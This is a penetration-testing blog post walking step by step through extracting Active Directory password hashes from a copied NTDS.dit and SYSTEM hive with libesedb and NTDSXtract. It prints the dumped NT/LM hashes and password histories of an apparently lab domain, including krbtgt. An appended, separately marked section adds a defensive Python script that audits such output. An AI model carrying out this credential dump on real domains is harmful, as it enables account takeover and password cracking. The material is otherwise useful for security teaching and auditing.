Malicious Link - Blog by mubix - Rob Fuller

Volume Shadow Copy NTDS.DIT Domain Hashes Remotely - Part 2


In Part 2 we have the NTDS.dit file and the SYSTEM hive. First we need a few tools:

From: http://www.ntdsxtract.com/

Download: http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

From: http://code.google.com/p/libesedb/

Download: http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

wget http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the tools:

tar zxvf libesedb-alpha-20120102.tar.gz
unzip ntdsxtract_v1_0.zip

Compile/make libesedb:

root@wpad:~/blog/# cd libesedb-20120102
root@wpad:~/blog/libesedb-20120102# ./configure
root@wpad:~/blog/libesedb-20120102# make

Export the tables from NTDS.dit:

root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport
esedbexport 20120102

Missing source file.
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
                   [ -T table_name ] [ -hvV ] source

        source: the source file

        -c:     codepage of ASCII strings, options: ascii, windows-874,
                windows-932, windows-936, windows-1250, windows-1251,
                windows-1252 (default), windows-1253, windows-1254
                windows-1255, windows-1256, windows-1257 or windows-1258
        -h:     shows this help
        -l:     logs information about the exported items
        -m:     export mode, option: all, tables (default)
                'all' exports all the tables or a single specified table with indexes,
                'tables' exports all the tables or a single specified table
        -t:     specify the basename of the target directory to export to
                (default is the source filename) esedbexport will add the suffix
                .export to the basename
        -T:     exports only a specific table
        -v:     verbose output to stderr
        -V:     print version

root@wpad:~/blog/libesedb-20120102/esedbtools#
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.dit
esedbexport 20120102

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

Move the exported tables somewhere a bit easier to reach:

root@wpad:~/blog/libesedb-20120102/esedbtools#
root@wpad:~/blog/libesedb-20120102/esedbtools# mv ntds.dit.export/ ../../

NTDSXtract can do a lot more than just hashes:

root@wpad:~/blog# cd NTDSXtract 1.0/
root@wpad:~/blog/NTDSXtract 1.0# ls
dscomputers.py  dsdeletedobjects.py  dsfileinformation.py  dsgroups.py  dstimeline.py  dsusers.py  framework  ntds
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py
DSUsers
Extracts information related to user objects

usage: dsusers.py <datatable> <linktable> [option]

  options:
    --rid <user rid>
          List user identified by RID
    --name <user name regexp>
          List user identified by Name
    --passwordhashes <system hive>
          Extract password hashes
    --passwordhistory <system hive>
          Extract password history
    --certificates
          Extract certificates
    --supplcreds <system hive>
          Extract kerberos keys
    --membership
          List groups of which the user is a member
root@wpad:~/blog/NTDSXtract 1.0#

But we like hashes:

root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive
Running with options:
  Extracting password hashes
  Extracting password history
Initialising engine...
Scanning database - 100% -> 3475 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...

List of users:
==============
Record ID:           3562
User name:           Administrator
User principal name:
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 7ceee337-fa58-4ca0-9643-540a40161020
SID:  S-1-5-21-3825330677-773554443-1603823854-500
When created:         2012-08-22 03:12:59
When changed:         2013-05-15 04:06:55
Account expires:      Never
Password last set:    2012-08-22 02:49:42.899576
Last logon:           2013-05-15 04:08:04.547236
Last logon timestamp: 2013-05-15 04:06:55.577353
Bad password time     2013-06-07 02:34:34.560516
Logon count:          9
Bad password count:   1
User Account Control:
  NORMAL_ACCOUNT
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users Administrator
Password hashes:
  Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::
Password history:

Record ID:           3563
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 659723d7-1246-4959-b0fc-af80ea5e3816
SID:  S-1-5-21-3825330677-773554443-1603823854-501
When created:         2012-08-22 03:12:59
When changed:         2013-03-14 06:54:22
Account expires:      Never
Password last set:    2013-03-14 06:54:22.029303
Last logon:           2013-03-14 06:54:27.012817
Last logon timestamp: 2013-03-14 06:32:41.834022
Bad password time     2013-06-07 03:07:46.499917
Logon count:          0
Bad password count:   10
User Account Control:
  PWD Not Required
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users Guest
Password hashes:
  Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::
Password history:

Record ID:           3564
User name:           user
User principal name:
SAM Account name:    user
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03
SID:  S-1-5-21-3825330677-773554443-1603823854-1000
When created:         2012-08-22 03:12:59
When changed:         2013-06-07 02:51:54
Account expires:      Never
Password last set:    2013-03-14 03:25:11.793912
Last logon:           2013-06-07 02:51:54.152191
Last logon timestamp: 2013-06-07 02:51:54.152191
Bad password time     2013-04-19 05:25:40.412670
Logon count:          67
Bad password count:   0
User Account Control:
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users user
Password hashes:
  user:$NT$88e4d9fabaecf3dec18dd80905521b29:::
Password history:
  user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::
  user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::
  user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::
  user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::
  user_lmhistory1:8be023cd858da1edd21b94907afe182c:::

Record ID:           3610
User name:           krbtgt
User principal name:
SAM Account name:    krbtgt
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9
SID:  S-1-5-21-3825330677-773554443-1603823854-502
When created:         2012-08-22 03:16:03
When changed:         2012-08-22 03:31:13
Account expires:      Never
Password last set:    2012-08-22 03:16:03.166457
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
User Account Control:
  Disabled
  NORMAL_ACCOUNT
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users krbtgt
Password hashes:
  krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::
Password history:
  krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::
  krbtgt_lmhistory0:113926e06a31d182623633041b632929:::

Record ID:           3762
User name:           John Doe
User principal name: jdoe@projectmentor.net
SAM Account name:    jdoe
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940
SID:  S-1-5-21-3825330677-773554443-1603823854-1104
When created:         2012-08-22 04:10:52
When changed:         2013-06-05 13:04:11
Account expires:      Never
Password last set:    2013-04-19 07:11:49.849592
Last logon:           2013-06-07 02:56:25.677855
Last logon timestamp: 2013-06-05 13:04:11.674344
Bad password time     2013-05-02 03:01:12.536251
Logon count:          242
Bad password count:   0
User Account Control:
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users John Doe
Password hashes:
  John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::
Password history:

Record ID:           3797
User name:           Random User
User principal name: randy@projectmentor.net
SAM Account name:    randy
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2701eb29-628a-4568-a093-d33a7db10d04
SID:  S-1-5-21-3825330677-773554443-1603823854-1108
When created:         2013-04-08 02:34:04
When changed:         2013-05-27 16:06:07
Account expires:      Never
Password last set:    2013-04-19 06:59:25.423280
Last logon:           2013-04-08 02:34:10.482690
Last logon timestamp: 2013-04-08 02:34:10.482690
Bad password time     Never
Logon count:          1
Bad password count:   0
User Account Control:
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users Random User
Password hashes:
  Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::
Password history:
root@wpad:~/blog/NTDSXtract 1.0#

All done. Start crackin’
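The same dsusers.py output is also what an AD team reads after a domain-hash exposure or an audit of its own NTDS.dit copy. As an added example (not from the post and not part of NTDSXtract), the Python below parses output in the layout shown above, splitting on `Record ID:` blocks, collecting the indented `User Account Control`, `Password hashes` and `Password history` sections, and handling `Bad password time`, the one field printed without a colon, and then flags what a defender looks for in such a dump: `PWD Not Required` accounts, passwords that never expire on enabled accounts, LM hashes still stored, and one NT hash shared by several enabled accounts. The input is a constructed sample in that layout; the account names and hashes are made up.

```python
import re
from collections import defaultdict

# Constructed sample in the layout dsusers.py prints above; every value is made
# up (the hashes are arbitrary hex) and nothing is copied from the post's dump.
SAMPLE_OUTPUT = """\
List of users:
==============
Record ID:           3562
SAM Account name:    Administrator
Bad password time     2013-06-07 02:34:34.560516
User Account Control:
  NORMAL_ACCOUNT
Password hashes:
  Administrator:$NT$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
Password history:

Record ID:           3564
SAM Account name:    svc_backup
Bad password time     Never
User Account Control:
  PWD Not Required
  NORMAL_ACCOUNT
  PWD Never Expires
Password hashes:
  svc_backup:$NT$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
Password history:
  svc_backup_nthistory0:$NT$cccccccccccccccccccccccccccccccc:::
  svc_backup_lmhistory0:dddddddddddddddddddddddddddddddd:::

Record ID:           3610
SAM Account name:    old_admin
User Account Control:
  Disabled
  NORMAL_ACCOUNT
Password hashes:
  old_admin:$NT$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
Password history:
"""

# Keys whose values follow on indented lines rather than on the key's own line.
SECTIONS = {"User Account Control": "flags", "Ancestors": "ancestors",
            "Password hashes": "hashes", "Password history": "history"}
# pwdump-style line: <account>:$NT$<32 hex>::: for NT, <account>:<32 hex>::: for LM.
HASH_LINE = re.compile(r"^(?P<acct>.+?):(?P<nt>\$NT\$)?(?P<hex>[0-9a-fA-F]{32}):::$")


def parse_users(text):
    """One dict per 'Record ID:' block; list-valued keys hold the indented sections."""
    users, cur, section = [], None, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("Record ID:"):
            cur = {v: [] for v in SECTIONS.values()}
            users.append(cur)
        if cur is None:
            continue                        # banner lines before the first record
        if raw[0].isspace():                # indented: belongs to the open section
            if section:
                cur[section].append(raw.strip())
            continue
        if raw.startswith("Bad password time"):  # the one field printed without ':'
            section, cur["Bad password time"] = None, raw[17:].strip()
            continue
        key, _, value = raw.partition(":")
        section = SECTIONS.get(key.strip())
        if section is None:
            cur[key.strip()] = value.strip()
    return users


def audit(users):
    """Return (account, finding) pairs a defender would act on."""
    findings, by_nt_hash = [], defaultdict(list)
    for u in users:
        name, flags = u.get("SAM Account name", "?"), set(u["flags"])
        enabled = "Disabled" not in flags
        current = [HASH_LINE.match(h) for h in u["hashes"]]
        history = [HASH_LINE.match(h) for h in u["history"]]
        if "PWD Not Required" in flags:
            findings.append((name, "PASSWD_NOTREQD set: an empty password is allowed"))
        if enabled and "PWD Never Expires" in flags:
            findings.append((name, "password never expires on an enabled account"))
        if any(m and not m["nt"] for m in current + history):
            findings.append((name, "LM hash stored: NoLMHash was not enforced when it was set"))
        for m in current:
            if enabled and m and m["nt"]:
                by_nt_hash[m["hex"].lower()].append(name)
    for names in by_nt_hash.values():
        if len(names) > 1:
            findings.append((", ".join(names), "identical NT hash: one password on several enabled accounts"))
    return findings


if __name__ == "__main__":
    for acct, what in audit(parse_users(SAMPLE_OUTPUT)):
        print(f"{acct:<28} {what}")
```

On the sample the disabled `old_admin` account shares Administrator's NT hash but is left out of the reuse finding, while `svc_backup` produces three findings of its own plus the shared-hash one with Administrator. Pointing `parse_users` at a real dsusers.py capture instead of `SAMPLE_OUTPUT` is the only change needed to run it over a full export.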
